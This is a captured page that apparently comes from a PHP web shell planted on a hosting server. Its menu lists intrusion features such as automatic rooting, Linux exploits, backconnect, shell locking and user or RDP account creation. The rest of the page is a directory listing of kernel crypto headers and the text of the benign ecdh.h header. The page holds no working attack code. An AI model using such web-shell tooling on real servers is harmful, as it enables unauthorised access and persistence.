Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.242.81
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-25 /
include /
crypto /
[ HOME SHELL ]
Name
Size
Permission
Action
internal
[ DIR ]
drwxr-xr-x
acompress.h
8.86
KB
-rw-r--r--
aead.h
18.39
KB
-rw-r--r--
aes.h
2.5
KB
-rw-r--r--
akcipher.h
12.92
KB
-rw-r--r--
algapi.h
7.15
KB
-rw-r--r--
arc4.h
484
B
-rw-r--r--
asym_tpm_subtype.h
521
B
-rw-r--r--
authenc.h
635
B
-rw-r--r--
b128ops.h
2.41
KB
-rw-r--r--
blake2b.h
1.6
KB
-rw-r--r--
blake2s.h
2.72
KB
-rw-r--r--
blowfish.h
415
B
-rw-r--r--
cast5.h
590
B
-rw-r--r--
cast6.h
607
B
-rw-r--r--
cast_common.h
232
B
-rw-r--r--
chacha.h
3.13
KB
-rw-r--r--
chacha20poly1305.h
1.66
KB
-rw-r--r--
cryptd.h
2
KB
-rw-r--r--
ctr.h
1.42
KB
-rw-r--r--
curve25519.h
2.02
KB
-rw-r--r--
des.h
1.68
KB
-rw-r--r--
dh.h
2.51
KB
-rw-r--r--
drbg.h
8.95
KB
-rw-r--r--
ecc_curve.h
1.31
KB
-rw-r--r--
ecdh.h
2.43
KB
-rw-r--r--
engine.h
4.11
KB
-rw-r--r--
gcm.h
867
B
-rw-r--r--
gf128mul.h
9.42
KB
-rw-r--r--
ghash.h
388
B
-rw-r--r--
hash.h
34.04
KB
-rw-r--r--
hash_info.h
998
B
-rw-r--r--
hmac.h
173
B
-rw-r--r--
if_alg.h
6.58
KB
-rw-r--r--
kpp.h
9.91
KB
-rw-r--r--
md5.h
497
B
-rw-r--r--
nhpoly1305.h
2.18
KB
-rw-r--r--
null.h
346
B
-rw-r--r--
padlock.h
438
B
-rw-r--r--
pcrypt.h
815
B
-rw-r--r--
pkcs7.h
1.15
KB
-rw-r--r--
poly1305.h
2.44
KB
-rw-r--r--
public_key.h
2.38
KB
-rw-r--r--
rng.h
6.59
KB
-rw-r--r--
scatterwalk.h
2.94
KB
-rw-r--r--
serpent.h
696
B
-rw-r--r--
sha1.h
1.18
KB
-rw-r--r--
sha1_base.h
2.45
KB
-rw-r--r--
sha2.h
3.76
KB
-rw-r--r--
sha256_base.h
2.56
KB
-rw-r--r--
sha3.h
879
B
-rw-r--r--
sha512_base.h
3.18
KB
-rw-r--r--
skcipher.h
19.95
KB
-rw-r--r--
sm2.h
749
B
-rw-r--r--
sm3.h
897
B
-rw-r--r--
sm3_base.h
2.55
KB
-rw-r--r--
sm4.h
1.12
KB
-rw-r--r--
streebog.h
949
B
-rw-r--r--
twofish.h
743
B
-rw-r--r--
xts.h
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ecdh.h
/* SPDX-License-Identifier: GPL-2.0-or-later */ /* * ECDH params to be used with kpp API * * Copyright (c) 2016, Intel Corporation * Authors: Salvatore Benedetto <salvatore.benedetto@intel.com> */ #ifndef _CRYPTO_ECDH_ #define _CRYPTO_ECDH_ /** * DOC: ECDH Helper Functions * * To use ECDH with the KPP cipher API, the following data structure and * functions should be used. * * The ECC curves known to the ECDH implementation are specified in this * header file. * * To use ECDH with KPP, the following functions should be used to operate on * an ECDH private key. The packet private key that can be set with * the KPP API function call of crypto_kpp_set_secret. */ /* Curves IDs */ #define ECC_CURVE_NIST_P192 0x0001 #define ECC_CURVE_NIST_P256 0x0002 #define ECC_CURVE_NIST_P384 0x0003 /** * struct ecdh - define an ECDH private key * * @key: Private ECDH key * @key_size: Size of the private ECDH key */ struct ecdh { char *key; unsigned short key_size; }; /** * crypto_ecdh_key_len() - Obtain the size of the private ECDH key * @params: private ECDH key * * This function returns the packet ECDH key size. A caller can use that * with the provided ECDH private key reference to obtain the required * memory size to hold a packet key. * * Return: size of the key in bytes */ unsigned int crypto_ecdh_key_len(const struct ecdh *params); /** * crypto_ecdh_encode_key() - encode the private key * @buf: Buffer allocated by the caller to hold the packet ECDH * private key. The buffer should be at least crypto_ecdh_key_len * bytes in size. * @len: Length of the packet private key buffer * @p: Buffer with the caller-specified private key * * The ECDH implementations operate on a packet representation of the private * key. * * Return: -EINVAL if buffer has insufficient size, 0 on success */ int crypto_ecdh_encode_key(char *buf, unsigned int len, const struct ecdh *p); /** * crypto_ecdh_decode_key() - decode a private key * @buf: Buffer holding a packet key that should be decoded * @len: Length of the packet private key buffer * @p: Buffer allocated by the caller that is filled with the * unpacked ECDH private key. * * The unpacking obtains the private key by pointing @p to the correct location * in @buf. Thus, both pointers refer to the same memory. * * Return: -EINVAL if buffer has insufficient size, 0 on success */ int crypto_ecdh_decode_key(const char *buf, unsigned int len, struct ecdh *p); #endif
Close